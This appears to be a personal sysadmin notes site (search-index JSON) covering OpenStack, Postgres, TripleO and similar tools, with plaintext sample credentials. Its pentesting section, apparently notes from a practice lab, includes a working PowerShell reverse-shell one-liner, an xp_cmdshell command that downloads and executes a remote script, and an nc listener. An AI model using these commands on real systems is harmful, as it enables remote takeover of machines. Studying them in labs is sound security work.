    "},{"location":"openstack/#evacuate-single-server-from-compute","title":"Evacuate single server from compute","text":"
    nova evacuate 1d6a436b-e18e-45ce-8b01-bee4a7126f81\n
    "},{"location":"openstack/#evacuate-single-server-from-compute-to-a-specific-destination","title":"Evacuate single server from compute to a specific destination","text":"
    nova evacuate 5f58a1bf-a7f9-4952-b980-af9d52a11e66 qasite1-compute001.localdomain\n
    "},{"location":"openstack/#openstack-create-image-with-different-id","title":"Openstack create image with different id.","text":"

    Use the --id flag

    openstack image create --id cirros-0.4.0 --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    07d76f4e-c920-49ea-af06-bd3c322f16cf\n\nopenstack router set --external-gateway EXT_NET --enable-snat --fixed-ip subnet=EXT_SUB,ip-address=192.168.70.2\n\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n\nneutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n\nnetwork : e23f7863-6e84-4395-bbbb-45877e950f2a\nsubnet : 5bee0941-8d7f-4869-896d-e34e1f2e8b3d\n\n9ce38b2c-b13b-4e65-8e68-32b146115a62 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.10 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_1\n\neefa2140-fd69-4daf-8b0d-0eafcf3e24b9 : openstack port create --fixed-ip subnet=5bee0941-8d7f-4869-896d-e34e1f2e8b3d,ip-address=10.100.100.11 --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus_2\n\nneutron net-create PROV_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --allocation-pool start=192.168.71.10,end=192.168.71.100 --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\nneutron net-create PROV_NET --shared --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 71\nneutron subnet-create PROV_NET --name PROV_SUB --disable-dhcp --gateway 192.168.71.1 192.168.71.0/24\n
    "},{"location":"openstack/#random-useful-commands","title":"Random useful commands","text":"
    openstack server list --all -c ID -c Name --host $NOVA_COMPUTE_NAME_HERE -f value\n
    "},{"location":"openstack/#upload-custom-image","title":"Upload custom image","text":"
    openstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n
    "},{"location":"openstack/#create-flavor","title":"Create flavor","text":"
    openstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\nopenstack flavor create --ram 16384 --disk 21 --vcpus 8 \\\n--private \\\n--project $PROJECT_ID_HERE \\\n--property aggregate_instance_extra_specs:$HOST_AGG_NAME_HERE='true' \\\n--property hw:cpu_policy='dedicated' \\\n--property hw:cpu_thread_policy='prefer' \\\n--property hw:mem_page_size='1GB' \\\n--property hw:numa_cpus.0='1-7' \\\n--property hw:numa_cpus.1='0' \\\n--property hw:numa_mem.0='8192' \\\n--property hw:numa_mem.1='8192' \\\n--property hw:numa_mempolicy='strict' \\\n--property hw:numa_nodes='2' \\\nTEST\n
    "},{"location":"openstack/#create-vm","title":"Create VM","text":"
    openstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-1\nopenstack server create --image e090519f-91f6-4c21-baf5-08642d0bd28b --flavor f60498da-a9a9-4772-a05c-75b4aaa6389a --network e23f7863-6e84-4395-bbbb-45877e950f2a cumulus-2\n
    "},{"location":"openstack/#compute-node-requirements","title":"Compute node requirements","text":"
    https://docs.openstack.org/nova/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-rdo.html\nhttps://docs.openstack.org/neutron/rocky/install/compute-install-option1-rdo.html\n
    "},{"location":"openstack/#create-a-external-network-with-a-subnet-attached-to-that-network","title":"Create a external network with a subnet attached to that network.","text":"
    neutron net-create EXT_NET --router:external True --provider:physical_network physnet1 --provider:network_type vlan --provider:segmentation_id 70\nneutron subnet-create EXT_NET --name EXT_SUB --allocation-pool start=192.168.70.10,end=192.168.70.100 --disable-dhcp --gateway 192.168.70.1 192.168.70.0/24\n
    "},{"location":"openstack/#random-commands","title":"Random commands","text":"
    #Create image\nopenstack image create --disk-format qcow2 --container-format bare --public --file ./cirros-0.4.0-x86_64-disk.img cirros-0.4.0\n\n#Create flavor\nopenstack flavor create --ram 1024 --disk 10 --vcpus 1 --public small-flavor\n\n#Create network\nopenstack network create network-floating-ip1\nopenstack floating ip create --subnet floating-ip-1\n\n#Create provider network with vlan\nopenstack network create --share --provider-physical-network provider --provider-network-type vlan provider1\n
    /etc/hosts\n\n10.12.0.2     controller01\n\n10.12.0.3       compute01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.3       compute01\n\n10.12.0.2       controller01\n10.12.0.4       compute02\n10.12.0.5       compute03\n\n\n################################\n\n10.12.0.4       compute02\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.5       compute03\n\n################################\n\n10.12.0.5       compute03\n\n10.12.0.2       controller01\n10.12.0.3       compute01\n10.12.0.4       compute02\n
    Placeholder password : openstack2019\n\nRABBIT_PASS : openstack2019\nrabbitmqctl add_user openstack openstack2019\n\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'localhost' \\\nIDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON keystone.* TO 'keystone'@'%' \\\nIDENTIFIED BY 'openstack2019';\n\n\nconnection = mysql+pymysql://keystone:openstack2019@controller01/keystone\n\n\nkeystone-manage bootstrap --bootstrap-password openstack2019 \\\n  --bootstrap-admin-url http://controller01:5000/v3/ \\\n  --bootstrap-internal-url http://controller01:5000/v3/ \\\n  --bootstrap-public-url http://controller01:5000/v3/ \\\n  --bootstrap-region-id RegionOne\n\n\nexport OS_USERNAME=admin\nexport OS_PASSWORD=openstack2019\nexport OS_PROJECT_NAME=admin\nexport OS_USER_DOMAIN_NAME=Default\nexport OS_PROJECT_DOMAIN_NAME=Default\nexport OS_AUTH_URL=http://controller01:5000/v3\nexport OS_IDENTITY_API_VERSION=3\n\n\n\nopenstack domain create --description \"Test Domain\" example\n\nopenstack project create --domain default \\\n  --description \"Service Project\" service\n\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON glance.* TO 'glance'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nwww_authenticate_uri  = http://controller01:5000\nauth_url = http://controller01:5000\nmemcached_servers = controller01:11211\nauth_type = password\nproject_domain_name = Default\nuser_domain_name = Default\nproject_name = service\nusername = glance\npassword = openstack2019\n\n\n\n### Deploy Compute NOVA service on Controller node.\n
    CREATE DATABASE nova_api;\nCREATE DATABASE nova;\nCREATE DATABASE nova_cell0;\nCREATE DATABASE placement;\n\n\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_api.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON nova_cell0.* TO 'nova'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\nGRANT ALL PRIVILEGES ON placement.* TO 'placement'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\n\nopenstack user create --domain default --password-prompt nova\n\nopenstack role add --project service --user nova admin\n\n\nopenstack service create --name nova \\\n  --description \"OpenStack Compute\" compute\n\nopenstack endpoint create --region RegionOne \\\n  compute public http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute internal http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  compute admin http://controller01:8774/v2.1\n\nopenstack endpoint create --region RegionOne \\\n  placement public http://controller01:8778\n\nopenstack endpoint create --region RegionOne \\\n  placement internal http://controller01:8778\n\n\nopenstack endpoint create --region RegionOne \\\n  placement admin http://controller01:8778\n\n\nmodprobe br_netfilter\necho \"$(sysctl -w net.bridge.bridge-nf-call-iptables=1)\" >> /etc/sysctl.conf\necho \"$(sysctl -w net.bridge.bridge-nf-call-ip6tables=1)\" >> /etc/sysctl.conf\nsysctl -p /etc/sysctl.conf\n\n\n\nGRANT ALL PRIVILEGES ON neutron.* TO 'neutron'@'localhost' \\\n  IDENTIFIED BY 'openstack2019';\n\nGRANT ALL 
PRIVILEGES ON neutron.* TO 'neutron'@'%' \\\n  IDENTIFIED BY 'openstack2019';\n\nopenstack endpoint create --region RegionOne \\\n  network public http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network internal http://controller01:9696\n\nopenstack endpoint create --region RegionOne \\\n  network admin http://controller01:9696\n\n\nopenstack subnet create --network provider \\\n  --allocation-pool start=10.13.0.100,end=10.13.0.200 \\\n  --dns-nameserver 10.13.0.1 --gateway 10.13.0.1 \\\n  --subnet-range 10.13.0.0/24 provider\n\n\n\nopenstack server create --flavor m1.nano --image cirros \\\n  --nic net-id=dee9dde7-0edb-4311-a06e-5ffb98144527 --security-group default \\\n  provider-instance\n\n\nnova-manage cell_v2 map_cell0\nnova-manage db sync\n
    "},{"location":"openvpn/","title":"OpenVPN","text":""},{"location":"openvpn/#connect-to-a-remote-server","title":"Connect to a remote server","text":"
    sudo openvpn --config s2s-client.ovpn --daemon --status /var/log/openvpn-status 5\n
    "},{"location":"opnfv/","title":"OPNFV","text":""},{"location":"opnfv/#random-notes","title":"Random notes","text":"

    Source : https://readthedocs.org/projects/opnfv-yardstick/downloads/pdf/stable-hunter/

    Yardstick GUI : http://10.10.99.43:8888/gui/index.html (Need the full path)

    #Main folder\n/home/opnfv/repos/yardstick\n#Workspace\n/tmp/workspace/yardstick\n
    "},{"location":"ovs/","title":"OVS","text":""},{"location":"ovs/#openstack-ovs-concepts","title":"Openstack OVS concepts","text":"

    br-int

    br-tun

    br-ext

    "},{"location":"ovs/#useful-commands","title":"Useful commands","text":"
    ovs-vsctl list interface\novs-vsctl list port\novs-vsctl show\novs-appctl fdb/show mybridge\n

    Show all OVS Bridges (OVS Bridges are virtual switches that are linking different ports creating in each switch)

    ovs-vsctl show\n

    List interfaces/ports attached to a bridge

    ovs-vsctl list-ifaces br-int\n
    "},{"location":"pentest/","title":"Pentesting","text":""},{"location":"pentest/#recon","title":"RECON","text":""},{"location":"pentest/#windows-commands","title":"Windows commands","text":"

    Output the contents of a file

    type potato\n

    Show current user

    whoami\n
    "},{"location":"pentest/#nmap","title":"NMAP","text":"

    Find TCP ports that are active

    ports=$(nmap -p- --min-rate=1000 -T4 $TARGET_IP | grep ^[0-9] | cut -d '/' -f 1 | tr '\\n' ',' | sed s/,$//)\n\nnmap -p- --min-rate=1000 -T4 $TARGET_IP -v\n

    Scan the ports that we're found + service detection.

    nmap -sC -sV -p$ports $TARGET_IP\n\nlaurentdumont@cr300-kali:~$ nmap -sC -sV -p 1433 10.10.10.27\nStarting Nmap 7.80 ( https://nmap.org ) at 2020-11-12 12:37 EST\nNmap scan report for 10.10.10.27\nHost is up (0.034s latency).\n\nPORT     STATE SERVICE  VERSION\n1433/tcp open  ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM\n| ms-sql-ntlm-info: \n|   Target_Name: ARCHETYPE\n|   NetBIOS_Domain_Name: ARCHETYPE\n|   NetBIOS_Computer_Name: ARCHETYPE\n|   DNS_Domain_Name: Archetype\n|   DNS_Computer_Name: Archetype\n|_  Product_Version: 10.0.17763\n| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback\n| Not valid before: 2020-11-06T18:53:07\n|_Not valid after:  2050-11-06T18:53:07\n|_ssl-date: 2020-11-12T18:56:28+00:00; +1h18m29s from scanner time.\n\nHost script results:\n|_clock-skew: mean: 1h18m28s, deviation: 0s, median: 1h18m28s\n| ms-sql-info: \n|   10.10.10.27:1433: \n|     Version: \n|       name: Microsoft SQL Server 2017 RTM\n|       number: 14.00.1000.00\n|       Product: Microsoft SQL Server 2017\n|       Service pack level: RTM\n|       Post-SP patches applied: false\n|_    TCP port: 1433\n
    "},{"location":"pentest/#smb-file-sharing","title":"SMB (file sharing)","text":"

    List Shares

    smbclient -N -L \\\\\\\\$TARGET_IP\\\\\n

    Connect to Share

    smbclient -N \\\\\\\\$TARGET_IP\\\\backups\n

    Get files from share

    laurentdumont@cr300-kali:~$ smbclient -N \\\\\\\\10.10.10.27\\\\backups\nTry \"help\" to get a list of possible commands.\nsmb: \\> dir\n  .                                   D        0  Tue Nov 10 17:21:13 2020\n  ..                                  D        0  Tue Nov 10 17:21:13 2020\n  prod.dtsConfig                     AR      609  Mon Jan 20 07:23:02 2020\n  user.txt                            A       32  Tue Feb 25 09:37:36 2020\n\n                10328063 blocks of size 4096. 7108669 blocks available\n\nsmb: \\> get user.txt\ngetting file \\user.txt of size 32 as user.txt (0.2 KiloBytes/sec) (average 0.2 KiloBytes/sec)\n
    "},{"location":"pentest/#using-imppacket","title":"Using ImpPacket","text":"
    git clone https://github.com/SecureAuthCorp/impacket\n# Move the utility from ./examples into the root folder\n\n# Run the utility\npython3 mssqlclient.py ARCHETYPE/sql_svc@10.10.10.27 -windows-auth\n\n# OR INSTALL ALL EXAMPLES (execute in project root folder)\npip3 install .\n
    "},{"location":"pentest/#microsoft-sql","title":"Microsoft SQL","text":""},{"location":"pentest/#check-if-user-is-admin","title":"Check if user is admin","text":"
    SQL> SELECT IS_SRVROLEMEMBER ('sysadmin')\n\n\n-----------   \n\n          1   \n

    IF 1 user is admin.

    "},{"location":"pentest/#validate-in-which-context-sql-server-is-running-and-enable-the-xp_cmdshell-module","title":"Validate in which context SQL Server is running and enable the 'xp_cmdshell' module.","text":"
    EXEC sp_configure 'Show Advanced Options', 1;\nreconfigure;\nsp_configure;\n\nEXEC sp_configure 'xp_cmdshell', 1\nreconfigure;\nxp_cmdshell \"whoami\"\n\nSQL>  xp_cmdshell \"whoami\" \noutput                                                                             \n\n--------------------------------------------------------------------------------   \n\narchetype\\sql_svc                                                                  \n\nNULL\n
    "},{"location":"pentest/#netcat-nc","title":"NETCAT (nc)","text":"

    Create a listener on tcp port 443

    sudo nc -lvnp 443\n
    "},{"location":"pentest/#windows-shell","title":"Windows Shell","text":"

    Attempt to connect to a listener and open a shell using TCP port 443. You need to replace the IP of the machine that is listening (with nc for example)

    $client = New-Object System.Net.Sockets.TCPClient(\"10.10.14.3\",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + \"# \";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() \n

    Execute the command on the SQL server. This will attempt to get the shell.ps1 file and execute it in the context of the user running the SQL server.

    xp_cmdshell \"powershell \"IEX (New-Object Net.WebClient).DownloadString(\\\"http://10.10.14.53/shell.ps1\\\");\"\n
    "},{"location":"pentest/#burp","title":"BURP","text":""},{"location":"pentest/#burp-intruder-sniper","title":"BURP Intruder Sniper","text":"
    GET /cdn-cgi/login/admin.php?content=accounts&id=\u00a7param1\u00a7 HTTP/1.1\nHost: 10.10.10.28\nCache-Control: max-age=0\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\nAccept-Encoding: gzip, deflate\nAccept-Language: en-US,en;q=0.9\nCookie: user=34322; role=admin\nConnection: close\n
    "},{"location":"pentest/#privilege-escalation-flow","title":"Privilege escalation flow","text":""},{"location":"pentest/#information-gathering","title":"Information gathering","text":"

    Get OS version

    lsb_release -a\n

    Get Kernel version

    uname -a\n

    Get current user info

    id\n
    "},{"location":"postgres/","title":"Postgres","text":""},{"location":"postgres/#connect-to-a-database","title":"Connect to a database","text":"
    psql -h 192.168.2.40 -U postgres hq_data\n
    "},{"location":"postgres/#create-a-database-and-a-user-with-admin-privileges","title":"Create a database and a user with admin privileges","text":"
    sudo apt-get install postgresql postgresql-client\nsudo -u postgres psql\ncreate database netbox;\ncreate user netbox_user with encrypted password 'test';\ngrant all privileges on database netbox to netbox_user;\n
    "},{"location":"postgres/#create-read-only-user","title":"Create Read only user","text":"
    CREATE ROLE read_only_user WITH LOGIN PASSWORD 'vKDHrGZuhH6vNf01VdyJ' \nNOSUPERUSER INHERIT NOCREATEDB NOCREATEROLE NOREPLICATION VALID UNTIL 'infinity';\n\\connect hq_data;\n\nGRANT CONNECT ON DATABASE hq_data TO read_only_user;\nGRANT USAGE ON SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL TABLES IN SCHEMA public TO read_only_user;\nGRANT SELECT ON ALL SEQUENCES IN SCHEMA public TO read_only_user;\nREVOKE CREATE ON SCHEMA public FROM PUBLIC;\n\nALTER DEFAULT PRIVILEGES IN SCHEMA public GRANT SELECT ON TABLES TO read_only_user;\n
    "},{"location":"postgres/#show-databases","title":"Show databases","text":"
    postgres=# \\l\n                                  List of databases\n   Name    |  Owner   | Encoding |   Collate   |    Ctype    |   Access privileges   \n-----------+----------+----------+-------------+-------------+-----------------------\n ara       | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =Tc/postgres         +\n           |          |          |             |             | postgres=CTc/postgres+\n           |          |          |             |             | ara_user=CTc/postgres\n postgres  | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | \n template0 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n template1 | postgres | UTF8     | en_US.UTF-8 | en_US.UTF-8 | =c/postgres          +\n           |          |          |             |             | postgres=CTc/postgres\n(4 rows)\n
    "},{"location":"postgres/#show-users","title":"Show users","text":"
    ara=> \\du\n                                   List of roles\n Role name |                         Attributes                         | Member of \n-----------+------------------------------------------------------------+-----------\n ara_user  | Create DB                                                  | {}\n postgres  | Superuser, Create role, Create DB, Replication, Bypass RLS | {}\n
    "},{"location":"postgres/#show-tables","title":"Show tables","text":"
    SELECT *\nFROM pg_catalog.pg_tables\nWHERE schemaname != 'pg_catalog' AND \n    schemaname != 'information_schema';\n
    "},{"location":"postgres/#describe-a-table","title":"Describe a table","text":"
    \\d TABLE NAME\n
    "},{"location":"postgres/#drop-table","title":"Drop table","text":"
    drop table hq_electricity_consumption ;\n
    "},{"location":"postgres/#show-active-user-sessions","title":"Show active user sessions","text":"
    select pid as process_id, \n       usename as username, \n       datname as database_name, \n       client_addr as client_address, \n       application_name,\n       backend_start,\n       state,\n       state_change\nfrom pg_stat_activity;\n
    "},{"location":"prometheus/","title":"Prometheus","text":"
    #Docker volume - Prometheus config\nsudo docker volume create prometheus-config\n\n#Docker volume - Prometheus metrics and adata\nsudo docker volume create prometheus-data\n\nsudo docker run -d -p 9090:9090 -v prometheus-config:/prometheus-config -v prometheus-data:/prometheus prom/prometheus --config.file=/prometheus-config/prometheus.yml\n

    Grafana container

    sudo docker volume create grafana-config\nsudo docker run \\\n  -d \\\n  -p 3000:3000 \\\n  --name=grafana \\\n  -v grafana-storage:/var/lib/grafana \\\n  -e \"GF_SECURITY_ADMIN_PASSWORD=PASSWORD_HERE\" \\\n  grafana/grafana\n

    Blackbox exporter

    docker run --rm -d -p 9115:9115 --name blackbox_exporter -v `pwd`:/config prom/blackbox-exporter:master --config.file=/config/blackbox.yml\n
    "},{"location":"proxmox/","title":"Proxmox","text":""},{"location":"proxmox/#user-and-permission-management","title":"User and permission management","text":""},{"location":"proxmox/#full-admin-over-specific-vms","title":"Full admin over specific VMs","text":"
    # Pool + VM are inside that pool.\n# Assume that the user already exists and we want to allow permissions on a specific group of VM.\npveum groupadd po-vm-group -comment \"PO VMs only\"\npveum aclmod /pool/PO-POOL-1/ -group po-vm-group -role PVEAdmin\npveum usermod riyoth@pam -group po-vm-group\n
    "},{"location":"python/","title":"Python","text":""},{"location":"python/#install-latest-python-on-ubuntu-side-by-side-with-os-version","title":"Install latest python on Ubuntu side by side with OS version","text":"
    sudo add-apt-repository ppa:deadsnakes/ppa\nsudo apt install python3.13-full\npython3.13 --version\n
    "},{"location":"python/#profiling-a-python-application","title":"Profiling a python application.","text":"
    pip3 install line_profiler\n

    Add the @profile to each function that is to be profiled

    # Use the decorator\n@profile\ndef some_func(*args, **kwargs)\n    ...\n

    Start the profiling process

    python3 -m line_profiler tag-exporter.py.lprof\n
    Timer unit: 1e-06 s\n\nTotal time: 2e-06 s\nFile: tag-exporter.py\nFunction: __init__ at line 13\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    13                                               @profile\n    14                                               def __init__(self):\n    15         1          2.0      2.0    100.0          self._endpoint = '6666'\n\nTotal time: 14.99 s\nFile: tag-exporter.py\nFunction: collect at line 17\n\nLine #      Hits         Time  Per Hit   % Time  Line Contents\n==============================================================\n    17                                               @profile\n    18                                               def collect(self):\n    19         5        115.0     23.0      0.0          GITLAB_PROJECTS_ID_LIST = os.getenv('GITLAB_PROJECTS_ID').split(',')\n    20         5         47.0      9.4      0.0          GITLAB_API_TOKEN = os.getenv('GITLAB_API_TOKEN')\n    21                                           \n    22         5      25743.0   5148.6      0.2          gl = gitlab.Gitlab('https://gitlab.gitlab.maker.studio', private_token=GITLAB_API_TOKEN, ssl_verify=False)\n    23                                           \n    24                                           \n    25        23         28.0      1.2      0.0          for project_id in GITLAB_PROJECTS_ID_LIST:\n    26        19    4103967.0 215998.3     27.4              project = gl.projects.get(project_id)\n    27        19    2781067.0 146371.9     18.6              tags = project.tags.list(per_page='1')\n    28                                                       # Get most recent tag - the tag list is returned \n    29        19        189.0      9.9      0.0              latest_tag = tags[0]\n    30                                           \n    31                                           \n    32        19         66.0      3.5      0.0         
     gitlab_tag_metric = Metric('gitlab_tag_version',\n    33        19        494.0     26.0      0.0          'Latest Gitlab tags for the project', 'summary')\n    34        19         73.0      3.8      0.0              gitlab_tag_metric.add_sample('gitlab_tag_version',\n    35        19        822.0     43.3      0.0          value='0', labels={'tag_version':str(latest_tag.name), 'project_name':str(project.name)})\n    36        19         51.0      2.7      0.0              yield gitlab_tag_metric\n    37                                           \n    38                                                       # Get the .gitlab-ci.yml from reach project in order to validate the target from the releases\n    39        18    4162769.0 231264.9     27.8              file_content = project.files.raw('.gitlab-ci.yml', 'master')\n    40        18    3913465.0 217414.7     26.1              test = yaml.safe_load(file_content)\n    41       144        132.0      0.9      0.0              for library_name, version_value in test['variables'].items():\n    42       126         85.0      0.7      0.0                  if 'VERSION' in library_name:\n    43        54         32.0      0.6      0.0                      library_version = version_value\n    44        54         39.0      0.7      0.0                      project_version_req = Metric('project_version_req',\n    45        54        287.0      5.3      0.0                      'Project versions requirements in Master branch', 'summary')\n    46        54         39.0      0.7      0.0                      project_version_req.add_sample('project_version_req',\n    47        54        432.0      8.0      0.0                      value='0', labels={'project':str(project.name), 'library_name':str(library_name),'target_version':str(library_version)})\n    48        54         38.0      0.7      0.0                      yield project_version_req\n
    "},{"location":"rasppi/","title":"RaspPi","text":"
    /home/user/.config/autostart/.desktop\n\n[Desktop Entry]\nType=Application\nExec=lxterminal -e \"vlc --fullscreen --loop --no-osd /home/bacon/Documents/ccop-loop.mp4\"\n
    "},{"location":"security/","title":"Security","text":""},{"location":"security/#disable-rpcbind","title":"Disable RPCBind.","text":"
    systemctl stop rpcbind.socket\nsystemctl disable rpcbind.socket\nsystemctl stop rpcbind\nsystemctl disable rpcbind\nnetstat -punta | grep 111\n
    "},{"location":"splunk/","title":"Splunk","text":""},{"location":"splunk/#_1","title":"Splunk","text":"

    Clear the splunk index and all data gathered. Will delete most of the existing data!

    cd /opt/splunk/bin\n./splunk stop\n./splunk clean eventdata\n./splunk start\n
    "},{"location":"terraform/","title":"Terraform","text":""},{"location":"terraform/#deployment-flow","title":"Deployment flow","text":"
    terraform init\nterraform apply\n
    "},{"location":"terraform/#terraform-debug","title":"Terraform debug","text":"
    TF_LOG=DEBUG OS_DEBUG=1 terraform apply\n
    "},{"location":"tripleo/","title":"Tripleo","text":""},{"location":"tripleo/#update-all-the-system-packages-first","title":"Update all the system packages first","text":"
    yum update\n
    "},{"location":"tripleo/#undercloud-deployment","title":"Undercloud deployment","text":"
    sudo useradd stack\nsudo passwd stack  # specify a password\n\necho \"stack ALL=(root) NOPASSWD:ALL\" | sudo tee -a /etc/sudoers.d/stack\nsudo chmod 0440 /etc/sudoers.d/stack\n\nsu - stack\n
    "},{"location":"tripleo/#get-the-packages-for-centos","title":"Get the packages for Centos","text":"
    sudo yum install -y https://trunk.rdoproject.org/centos7/current/python2-tripleo-repos-0.0.1-0.20191108012952.2655019.el7.noarch.rpm\n
    "},{"location":"tripleo/#install-the-rocky-repository","title":"Install the Rocky repository","text":"
    sudo -E tripleo-repos -b stein current\n
    "},{"location":"tripleo/#get-the-tripleo-cli-client-lots-of-stuff-to-install","title":"Get the TripleO CLI client (lots of stuff to install)","text":"
    sudo yum install -y python-tripleoclient\n
    "},{"location":"tripleo/#copy-the-default-deployment-template","title":"Copy the default deployment template","text":"
    cp /usr/share/python-tripleoclient/undercloud.conf.sample ~/undercloud.conf\n
    "},{"location":"tripleo/#deploy-the-undercloud","title":"Deploy the Undercloud","text":"
    openstack undercloud install\n
    "},{"location":"tripleo/#add-dns-to-overcloud","title":"Add DNS to Overcloud","text":"
    (undercloud) [stack@director ~]$ openstack subnet list\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| ID                                   | Name            | Network                              | Subnet          |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n| 08a306ed-a5e8-47cd-ac66-a67722d03a42 | ctlplane-subnet | fcda1208-3d2c-4b9c-a241-c4bcd0479b9f | 192.168.24.0/24 |\n+--------------------------------------+-----------------+--------------------------------------+-----------------+\n\nopenstack subnet set 08a306ed-a5e8-47cd-ac66-a67722d03a42 --dns-nameserver 8.8.8.8\n
    "},{"location":"tripleo/#overcloud-deployment","title":"Overcloud Deployment","text":"
    export DIB_YUM_REPO_CONF=\"/etc/yum.repos.d/delorean*\"\n\n#Build the images for the Overcloud\nopenstack overcloud image build\n\n# Upload the images\nopenstack overcloud image upload\n
    "},{"location":"tripleo/#register-the-nodes","title":"Register the nodes","text":"

    The instackenv.json file.

    {\n    \"nodes\": [\n        {\n            \"mac\":[\n                \"52:54:00:25:ca:d3\"\n            ],\n            \"name\": \"ooo-controller001\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16001\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1a:cc:2a\"\n            ], \n            \"name\": \"ooo-controller002\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16002\"\n        },\n        {\n            \"mac\":[\n                \"52:54:00:1c:0c:94\"\n            ],\n            \"name\": \"ooo-controller003\",\n            \"pm_type\": \"ipmi\",\n            \"cpu\": \"4\",\n            \"memory\": \"9216\",\n            \"disk\": \"50\",\n            \"arch\": \"x86_64\",\n            \"pm_user\": \"test\",\n            \"pm_password\": \"secret\",\n            \"pm_addr\": \"10.10.99.62\",\n            \"pm_port\": \"16003\"\n        }\n    ]\n}\n
    "},{"location":"tripleo/#create-the-nodes-within-ironic-openstack","title":"Create the nodes within Ironic Openstack","text":"
    openstack overcloud node import instackenv.json\n
    "},{"location":"tripleo/#ironic-paths","title":"Ironic paths","text":"
    #DNSMASQ\n/var/lib/ironic-inspector/dhcp-hostsdir\n#Ironic PXE\n/var/lib/ironic/httpboot/\n
    "},{"location":"tripleo/#list-nodes","title":"List nodes","text":"
    openstack baremetal node list\n
    "},{"location":"tripleo/#start-introspection","title":"Start introspection","text":"
    openstack overcloud node introspect --all-manageable\n\n# One node\nopenstack overcloud node introspect 32124951-3fcc-4da4-ba16-d05a3c66bb22\n
    "},{"location":"tripleo/#if-introspection-works-make-nodes-available","title":"If introspection works, make nodes available","text":"
    openstack overcloud node provide --all-manageable\n
    "},{"location":"tripleo/#deploy-overcloud","title":"Deploy Overcloud","text":"
    openstack overcloud deploy --templates\n
